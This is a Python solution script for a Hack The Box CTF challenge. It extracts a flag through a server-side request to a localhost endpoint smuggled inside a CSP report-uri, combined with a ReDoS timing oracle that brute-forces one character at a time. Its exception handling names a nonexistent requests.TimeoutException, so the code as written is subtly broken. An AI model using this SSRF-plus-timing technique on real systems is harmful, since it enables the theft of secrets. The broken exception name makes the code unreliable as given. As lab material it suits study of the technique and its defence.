ExpressionalRebel
import requests, re, urllib.parse
# Challenge API that evaluates a submitted CSP header; the angle-bracket placeholder is
# left for the reader to fill in with the instance host and port (kept verbatim here).
eval_endpoint = "http://<YOUR_INDSTANCE_AND_PORT>/api/evaluate"
# "127.1" is the short form of 127.0.0.1. This URL is handed to the evaluator as the
# report-uri, so it is presumably resolved by the challenge server itself, not by the client.
deactivate_endpoint = "http://127.1:1337/deactivate"
def brute_force_flag():
    """Recover the flag one character at a time from a regex timing oracle.

    Each candidate prefix is concatenated with a regex whose right-hand
    alternative is expensive to evaluate. A response that arrives within the
    timeout is read as "the prefix matched" (the cheap left side succeeded); a
    timeout is read as a miss and the next character is tried. Prints the
    growing guess after every accepted character and the final value at the end.

    NOTE(review): the timing signal exists because a caller-controlled pattern
    is, presumably, applied to the secret by a backtracking regex engine. On the
    defending side, a linear-time engine or a hard evaluation time limit removes
    the timing difference this loop depends on.
    """
    # Every candidate character is regex-escaped so it is matched literally.
    alphabet = map(re.escape, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789[]{}/\!@#$%^&*()_+=-<>?")
    # The tail here is just a hard-to-compute regex. If the request takes longer than ~100ms, this means that the right
    # hand side of this regex is being evaluated, and that means that the left side didn't match.
    regex = ".+|(?:[^<]+|<(?:[^\/]|\/(?:[^s])))*>(?:[^<]+|<(?:[^/]|\/(?:[^s]))*)"
    # Flags in this CTF format start with "HTB{", so the search begins from that prefix.
    current_guess = "HTB{"
    # Stop once the closing brace of the flag has been accepted.
    while current_guess[::-1][0] != "}":
        for char in alphabet:
            # Concat the current best guess with the character to test, and add the rest of the regex
            guess = current_guess + char + regex
            # Gotta make the secretCode URL safe
            u = deactivate_endpoint + "?secretCode=" + urllib.parse.quote(guess)
            # The probe travels as the report-uri directive of a CSP string submitted for evaluation.
            data = {
                "csp": "report-uri " + u + ";"
            }
            try:
                # 0.5 s is the threshold separating "matched" (fast) from "did not match" (slow).
                res = requests.post(eval_endpoint, timeout=0.5, data=data)
            except requests.TimeoutException as e:
                # If the request timed out, we missed, so skip to next
                continue
            # A timely response means this character extends the matched prefix.
            current_guess = current_guess + char
            print(current_guess)
    print("final guess was " + current_guess)
# Run the search only when the file is executed directly, not when it is imported.
if __name__ == "__main__":
    brute_force_flag()
Mohammed Amer